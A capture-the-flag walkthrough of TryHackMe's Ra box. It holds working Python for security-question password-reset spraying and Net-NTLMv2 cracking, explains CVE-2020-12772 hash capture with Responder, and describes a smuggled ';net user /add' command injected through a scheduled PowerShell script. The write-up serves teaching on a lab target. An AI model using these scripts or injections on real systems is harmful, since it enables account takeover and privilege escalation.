Ra – TryHackMe Walkthrough

I’m writing this post as I go through the Ra challenge on TryHackMe. I’ll try to be as detailed as possible, since I’m trying to differentiate this from other writeups and want the reader to learn as much as possible.

Port Scanning

Usually for THM I stick with nmap’s default top 1000 ports unless I’m not finding much; this is purely a time trade-off. To be thorough on a real pentest you’d want all 65535 TCP ports (-p-), and a UDP pass as well. For now I run “sudo nmap -v -sS IP” (root is needed for a SYN scan).
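As an added example (not part of the original write-up), here is the check I actually run when I later go back for the full-port scan: parse the grepable (-oG) output of the quick top-1000 scan and of the -p- scan and list what the quick one missed. run_nmap() shells out to a real nmap and needs root for -sS; the sample output lines at the bottom are constructed, not real scan data from the box.

```python
"""Check what a default (top-1000) nmap scan missed versus a full -p- scan.

Added example, not part of the original write-up. run_nmap() shells out to a
real nmap (root needed for -sS); parse_gnmap() and missed_ports() work on
grepable (-oG) output and are exercised below on constructed sample lines.
"""
import re
import subprocess
import sys

OPEN_TCP_RE = re.compile(r"(\d+)/open/tcp")


def parse_gnmap(text):
    """Return {host: set(open TCP ports)} from nmap -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("Ignored State:", 1)[0]
        hosts.setdefault(host, set()).update(
            int(p) for p in OPEN_TCP_RE.findall(ports_field))
    return hosts


def missed_ports(quick, full):
    """Per host, open ports the full scan found that the quick scan did not."""
    missed = {}
    for host, ports in full.items():
        extra = ports - quick.get(host, set())
        if extra:
            missed[host] = sorted(extra)
    return missed


def run_nmap(target, extra_args=()):
    """Run a SYN scan and return grepable output (requires root for -sS)."""
    cmd = ["sudo", "nmap", "-sS", "-oG", "-", *extra_args, target]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


# Constructed sample output (not real scan data from the box).
QUICK_SAMPLE = (
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 80/open/tcp//http///, 445/open/tcp//microsoft-ds///"
    "\tIgnored State: filtered (998)\n"
)
FULL_SAMPLE = (
    "Host: 10.10.10.10 ()\tPorts: 80/open/tcp//http///, 445/open/tcp//microsoft-ds///, "
    "49666/open/tcp//unknown///\tIgnored State: filtered (65532)\n"
)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        quick = parse_gnmap(run_nmap(target))            # default: top 1000 ports
        full = parse_gnmap(run_nmap(target, ["-p-"]))    # all 65535 TCP ports
    else:
        quick, full = parse_gnmap(QUICK_SAMPLE), parse_gnmap(FULL_SAMPLE)
    print("missed by the quick scan:", missed_ports(quick, full))
```

Run it with a target to do both scans back to back, or with no arguments to see the logic on the constructed sample. The high ephemeral port in the sample is the typical kind of thing a top-1000 scan skips on a Windows host.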

Checking The Website

So, I looked at the website.

One thing we notice from this screenshot is that there’s a password reset link. But when we try to go to it, we get this:

We can resolve this error by adding fire.windcorp.thm to our hosts file, or by going to the link using the IP address instead. I went ahead and edited my hosts file (/etc/hosts).

From here, we can click the link and get the reset password page:

We don’t have usernames or answers to these questions yet, but here is the list of questions:

Looking further down the main page, we see a quick tidbit about three employees:

One of these employees, “Lily Levesque”, has a picture with a dog, which could be her favorite pet (one of the security questions). I decided to do a reverse image search on Google as a bit of OSINT, but got even luckier when I copied the image location and pasted it into Google.

While this was luck (sometimes luck is what you need), I would have eventually seen the same thing by going through the page source, which is definitely a step I’d take if I wasn’t getting anywhere and needed to figure out what everything is doing. Also, I would have had to save the picture anyway, since the box sits on a private THM network and Google couldn’t have retrieved it. This was a slip-up as I’m used to public websites :). Anyway, let’s move forward.

At this point I thought we didn’t have her username and tried variants like llevesque, l.levesque and lily.levesque, and then it clicked that it was also in the image filename: “lilyle”. I went ahead and reset the password with the following request:

POST /check.asp HTTP/1.1
Host: fire.windcorp.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://fire.windcorp.thm/reset.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Connection: close
Cookie: JSESSIONID=node0n5xkn7uovpg3zgps7rsx4x8l29.node0; ASPSESSIONIDQQSCDTTQ=CCEJCFHDGMGKCHAEKENNEINE
Upgrade-Insecure-Requests: 1

username=lilyle&question=3&secret=Sparky

And I got the response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Fri, 14 Aug 2020 20:01:09 GMT
Connection: close
Content-Length: 1038

<head>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">

  <title>Windcorp.</title>

  <!-- Bootstrap core CSS -->
  <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

  <!-- Custom fonts for this template -->
  <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet">
  <link href="vendor/simple-line-icons/css/simple-line-icons.css" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic" rel="stylesheet" type="text/css">

  <!-- Custom styles for this template -->
  <link href="css/landing-page.min.css" rel="stylesheet">

</head>

<body>

<div class="jumbotron" style="height:100vh;">

<h4 class='display-3'>Your password has been reset to: <b>ChangeMe#1234</b><br></h4>Remember to change it after logging in!

</div>

</body>
</html>

You can see in this response that the password was reset to “ChangeMe#1234”. Yay! Two things are worth noting: the new password is a fixed value rather than something random, and it is handed straight back in the HTTP response. So anyone who can answer one security question (which we got from a public photo) ends up with a known password without ever touching the user’s mailbox.
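The reset flow above is easy to script. The following is an added example, not code from the original write-up: it generates the usual username formats for a “First Last” name (including the first-name-plus-two-letters form that “lilyle” turned out to be), sends the same POST that was captured above, and pulls the new password out of the response. The endpoint, form fields and response wording are taken from the captured traffic; the username patterns and the use of question id 3 with the answer “Sparky” are my assumptions based on that capture, and SAMPLE_RESPONSE is a constructed copy of the relevant part of the response for offline use.

```python
"""Automate the security-question password reset on fire.windcorp.thm.

Added example, not part of the original write-up. The endpoint (/check.asp),
the form fields (username, question, secret) and the response wording come
from the captured request/response above; the username patterns in
username_candidates() and the question id are my assumptions.
"""
import re
import urllib.parse
import urllib.request

RESET_URL = "http://fire.windcorp.thm/check.asp"
NEW_PASSWORD_RE = re.compile(r"password has been reset to:\s*<b>([^<]+)</b>", re.I)


def username_candidates(first, last):
    """Common username formats for 'First Last' (includes first + 2 letters of last)."""
    f, l = first.lower(), last.lower()
    cands = [f + l, f[0] + l, f[0] + "." + l, f + "." + l, f + l[:2], f + "_" + l, l + f[0]]
    return list(dict.fromkeys(cands))  # de-duplicate, keep order


def build_reset_request(username, question, secret):
    """POST body matches the captured request: username=...&question=...&secret=..."""
    body = urllib.parse.urlencode(
        {"username": username, "question": question, "secret": secret}).encode()
    return urllib.request.Request(
        RESET_URL, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})


def extract_new_password(html):
    """Pull the reset password out of the response page, or None on failure."""
    m = NEW_PASSWORD_RE.search(html)
    return m.group(1).strip() if m else None


def try_reset(username, question, secret, opener=urllib.request.urlopen):
    """Send one reset attempt; returns the new password or None."""
    with opener(build_reset_request(username, question, secret), timeout=10) as resp:
        return extract_new_password(resp.read().decode("utf-8", errors="replace"))


# Constructed copy of the meaningful part of the real response, for offline use.
SAMPLE_RESPONSE = ("<h4 class='display-3'>Your password has been reset to: "
                   "<b>ChangeMe#1234</b><br></h4>Remember to change it after logging in!")

if __name__ == "__main__":
    # question id 3 and the answer "Sparky" are what the captured request used.
    for user in username_candidates("Lily", "Levesque"):
        new_pw = try_reset(user, 3, "Sparky")
        if new_pw:
            print(f"{user}: password reset to {new_pw}")
            break
```

Keep in mind that every successful attempt really resets someone’s password, so on a real engagement this is noisy and destructive; confirm the username first (for example from page source or a mail format) rather than spraying every candidate.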

Using The Credentials

Now, where do we sign in? We had other ports open on the system, so let’s try the credentials against SMB. I tried running CrackMapExec but was not able to log in, so I just enumerated shares with smbmap.

A share called “Shared” was enumerated and we can see the flag and some executables.

I used smbclient to download these files:

When downloading the .deb I kept running into timeout errors.

I fixed this by raising smbclient’s per-request timeout with the -t (--timeout) option, which defaults to 20 seconds:

Now we can install the .deb file (e.g. sudo dpkg -i on the downloaded package).

After installing it, typing “spark” into the terminal brings up the UI, so now we know it’s Spark Instant Messenger, an XMPP client from Ignite Realtime. We can attempt to log in with the same creds we have.

If you run into certificate errors when logging in, check the options under Advanced (Spark lets you accept all certificates and disable certificate hostname verification there):

Okay, so we’re authenticated. Now what? Let’s look up what Spark IM is. After Googling “Spark Instant Messenger exploit” you’ll eventually come across CVE-2020-12772: Spark 2.8.3 with the ROAR plugin, on Windows, renders HTML in incoming messages, so an image element whose src points at an attacker-controlled host makes the victim’s client fetch it, and Windows will authenticate to that host with NTLM.

When searching for an exploit for CVE-2020-12772, you eventually come across a GitHub page with a proof of concept:

Cool, so now we know we can send something to someone, but to whom? Well, on the web page there were XMPP links. Let’s choose someone.

Since it shows Buse Candan as online, I chose to target them.

Okay, so we know that we need to capture this user’s NTLM authentication (a Net-NTLMv2 challenge/response) by exploiting the vulnerability we found. To do this we’ll use Responder, which answers the client’s request, issues the challenge and records the response. We’ve used Responder before: https://gameofpwnz.com/responder-multirelay-mimikatz-crackmapexec-windows-pwnage/

We set -I to “tun0” because we are on the VPN, so the payload must point at our tun0 address. We then send the payload to Buse:

Now we capture their hash in Responder:

Now that we have a hash, we can crack it. Unfortunately this type of hash is not usable for Pass-the-Hash: it’s a Net-NTLMv2 challenge/response, not the NT hash itself, and it is tied to the challenge Responder issued. We can’t relay it either, because the only target is the machine it came from, and relaying NTLM back to the originating host doesn’t work (that was closed by MS08-068): https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

We’ll try cracking it with rockyou.txt since it’s THM and that’s pretty much what’s expected. The hashcat mode for Net-NTLMv2 is 5600 (hashcat -m 5600 hash.txt rockyou.txt).

The mode is important: with the wrong one, hashcat either rejects the hash as malformed or computes the wrong thing and never cracks it.
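To make the cracking step and the no-Pass-the-Hash point above concrete, here is an added example (my own code, not from the write-up, Responder or hashcat) that does what mode 5600 does for each candidate password: compute the NT hash (MD4 of the UTF-16LE password), derive NTOWFv2 with HMAC-MD5 over the upper-cased username and domain, then HMAC-MD5 the server challenge plus the client blob and compare the result with the captured NTProofStr. MD4 is implemented inline because hashlib.new('md4') is unavailable on many OpenSSL 3 builds. The capture line it checks is constructed with forge_capture_line() from a made-up user, domain and password; it is not the hash captured on the box.

```python
"""What hashcat -m 5600 checks: recompute a Net-NTLMv2 response from a candidate
password and compare it with the captured NTProofStr.

Added example, not part of the original write-up or of Responder/hashcat.
MD4 is implemented here because hashlib.new('md4') is unavailable on many
OpenSSL 3 builds. SAMPLE_LINE is constructed, not the hash from the box.
"""
import hashlib
import hmac
import struct


def md4(data):
    """RFC 1320 MD4 (pure Python; fine for a demo, far too slow for cracking)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                      # round 1
            a = rotl((a + F(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                      # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + x[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
        for i in range(16):                      # round 3
            a = rotl((a + H(b, c, d) + x[order[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); this is what Pass-the-Hash would need."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password, user, domain):
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"),
                    hashlib.md5).digest()


def parse_5600(line):
    """USER::DOMAIN:server_challenge:NTProofStr:blob (Responder / hashcat 5600 format)."""
    user, _, rest = line.partition("::")
    domain, chal, proof, blob = rest.split(":", 3)
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def check_password(line, candidate):
    """True if candidate reproduces the captured NTProofStr."""
    user, domain, chal, proof, blob = parse_5600(line)
    got = hmac.new(ntowf_v2(candidate, user, domain), chal + blob, hashlib.md5).digest()
    return hmac.compare_digest(got, proof)


def crack(line, wordlist):
    """Return the first word that matches, or None."""
    return next((w for w in wordlist if check_password(line, w)), None)


def forge_capture_line(user, domain, password, server_challenge, blob):
    """Build a capture line for a known password (demo only)."""
    proof = hmac.new(ntowf_v2(password, user, domain), server_challenge + blob,
                     hashlib.md5).digest()
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: made-up user/domain/password, a fixed 8-byte server challenge
# and a minimal NTLMv2 blob (version header, zero timestamp, client challenge, no AV pairs).
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aa" * 8 + "00000000" + "00000000")
SAMPLE_LINE = forge_capture_line("victim", "EXAMPLE", "Summer2020!",
                                 bytes.fromhex("0102030405060708"), SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, ["123456", "password", "Summer2020!"]))
```

Because the NTProofStr is an HMAC over the server challenge, a captured line only ever proves knowledge of the password for that one exchange; it cannot be replayed to another challenge, which is why the path here is crack it and then log in with the recovered password rather than pass the hash.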

Looks like we cracked it. Now let’s use it. After toying around with ways to use the credentials, I installed Evil-WinRM so I could use WinRM to login

I then found the second flag on the Desktop. We also see a scripts directory in C:\

Looking at the files in the scripts directory, we see that a .ps1 file is run every minute. If you look at the .ps1 file, you’ll see this line:

It takes whatever is in the hosts.txt file in Brittany’s folder and passes it to Invoke-Expression. That is command injection by design: whoever can write hosts.txt gets their text executed as PowerShell, every minute, as whatever account runs the script.

We need write access to that hosts.txt file. Let’s check what permissions we have and what groups we’re in.

This didn’t get us much by itself.

After looking up all the groups, we see that Account Operators gives us the ability to alter accounts: members can create and modify user accounts and groups, except for administrative accounts and protected groups. https://www.secframe.com/blog/account-operators

We then change BrittanyCR’s password using the net user command (net user BrittanyCR <newpassword>):

We can then use smbmap to figure out the shares BrittanyCR has access to:

We can then see that we can upload over the hosts.txt file:

Our hosts.txt looks like this:

The leading “;” terminates the command the .ps1 script builds around the file content, and what follows runs as a fresh PowerShell statement: a net user ... /add to create gameofpwnz, followed by a net localgroup Administrators ... /add to put the new user in the Administrators group. The next run of the scheduled script executes it for us.

We can verify the GameOfPWNZ user is created:

We then use WinRM to log in as the new user and cat the admin flag:

And that’s it. We completed this box and got our points.